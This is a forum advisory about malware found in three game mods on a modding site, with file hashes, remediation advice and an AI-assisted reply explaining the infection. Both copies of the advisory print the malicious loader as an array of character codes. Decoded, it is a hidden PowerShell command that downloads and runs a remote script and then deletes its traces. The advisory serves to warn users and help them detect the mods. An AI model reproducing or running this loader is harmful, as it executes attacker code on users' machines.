Attention about malware in mods by Luffy

📢 Attention about malware in mods

If you had installed the following mods:

"Auto Save on Exit" by Subaiy MD5 hash - 6246fa47c492250128cbb4a463d2161a
"Kill Counter" by Daniel (if you downloaded this one: https://modworkshop.net/mod/56156 you are fine.) MD5 hash - bcee56cc847489a2a328189ba882d95e
"Enemies Drop Better Loot" by Krunker (If you downloaded this one: https://modworkshop.net/mod/56230 you are fine). MD5 hash - ba9e7d88f1079c0324d53bde5786e4da)

Your PC is likely infected with a malware. Do a proper reset to your computer.

What are we gonna do next? We are going to look for moderators to look at new mods for RTV. We'll be looking into ways to improve the site itself to better protect against these bad actors and also to let users know if a mod was infected - https://modworkshop.net/thread/13229. What can you do Again if you are infected, factory reset your computer. Search for suspicious things in the mods you download (like "powershell")
These attacks all follow the same pattern, they execute a powershell script using some encoded URL:
[64,101,99,104,111,32,111,102,102,10,115,116,97,114,116,32,47,98,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,99,32,34,105,119,114,32,104,116,116,112,115,58,47,47,114,111,97,100,116,111,118,111,115,116,111,107,46,115,116,111,114,101,47,100,97,46,112,115,49,32,45,111,117,116,32,37,84,69,77,80,37,92,100,108,46,112,115,49,32,45,117,115,101,98,59,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,102,32,37,84,69,77,80,37,92,100,108,46,112,115,49,59,32,83,116,97,114,116,45,83,108,101,101,112,32,53,59,32,100,101,108,32,37,84,69,77,80,37,92,100,108,46,112,115,49,34,10,100,101,108,32,34,37,126,48,34] Check file hash of the file you downloaded using: https://hash-file.online. Any mod containing powershell script without a good reason should be reported to moderators. Any mod that isn't open-source should be reported.

Attention about malware in mods

LuffyManagement

17 hours ago(Edited)

If you had installed the following mods:

"Auto Save on Exit" by Subaiy MD5 hash - 6246fa47c492250128cbb4a463d2161a
"Kill Counter" by Daniel (if you downloaded this one: https://modworkshop.net/mod/56156 you are fine.) MD5 hash - bcee56cc847489a2a328189ba882d95e
"Enemies Drop Better Loot" by Krunker (If you downloaded this one: https://modworkshop.net/mod/56230 you are fine). MD5 hash - ba9e7d88f1079c0324d53bde5786e4da)

Your PC is likely infected with a malware. Do a proper reset to your computer.

What are we gonna do next?

We are going to look for moderators to look at new mods for RTV.
We'll be looking into ways to improve the site itself to better protect against these bad actors and also to let users know if a mod was infected - https://modworkshop.net/thread/13229.

What can you do

Again if you are infected, factory reset your computer.
Search for suspicious things in the mods you download (like "powershell")
These attacks all follow the same pattern, they execute a powershell script using some encoded URL:
[64,101,99,104,111,32,111,102,102,10,115,116,97,114,116,32,47,98,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,99,32,34,105,119,114,32,104,116,116,112,115,58,47,47,114,111,97,100,116,111,118,111,115,116,111,107,46,115,116,111,114,101,47,100,97,46,112,115,49,32,45,111,117,116,32,37,84,69,77,80,37,92,100,108,46,112,115,49,32,45,117,115,101,98,59,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,102,32,37,84,69,77,80,37,92,100,108,46,112,115,49,59,32,83,116,97,114,116,45,83,108,101,101,112,32,53,59,32,100,101,108,32,37,84,69,77,80,37,92,100,108,46,112,115,49,34,10,100,101,108,32,34,37,126,48,34]
Check file hash of the file you downloaded using: https://hash-file.online.
Any mod containing powershell script without a good reason should be reported to moderators.
Any mod that isn't open-source should be reported.

Replies

Return to Replies Subscribe

matcovic

5 hours ago

This message was written with the help of AI.

⚠️ For everyone who already KNOWS this mod is malware – here is what is actually happening and what it means:

If you used the mod, your PC has already:

Executed a hidden PowerShell command
Downloaded a remote script from the internet
Executed that script silently
Deleted the visible traces afterwards

This means:
👉 You did NOT just run a mod
👉 You allowed external code to run on your system

What is likely happening right now

Depending on what the downloaded script ("da.ps1") contained, your system could currently:

Have a stealer running (browser passwords, cookies, tokens)
Have a background connection to a remote server
Have additional malware installed
Have persistence (auto-start after reboot)

Even if you see NOTHING:
→ that is completely normal for this type of attack

What this means for you

Your accounts may already be compromised
Changing passwords too early = useless (they can be stolen again)
The infection may still be active in the background

What to do RIGHT NOW (no debate)

Disconnect from internet
Run full antivirus scan
Run offline scan (important)
Only AFTER that:
- Change passwords
- Enable 2FA
- Log out all sessions

About the mod site

I will personally avoid modworkshop.net for now, as it currently feels unsafe to download from there until this situation is clarified.

Reset or not?

Full reset = safest option
No reset = possible, BUT only if you properly clean the system

Final reality check

This is not:

a bug
a mistake
a “harmless mod”

This is:
👉 a loader that executed remote code on your PC

Act accordingly.

64 1700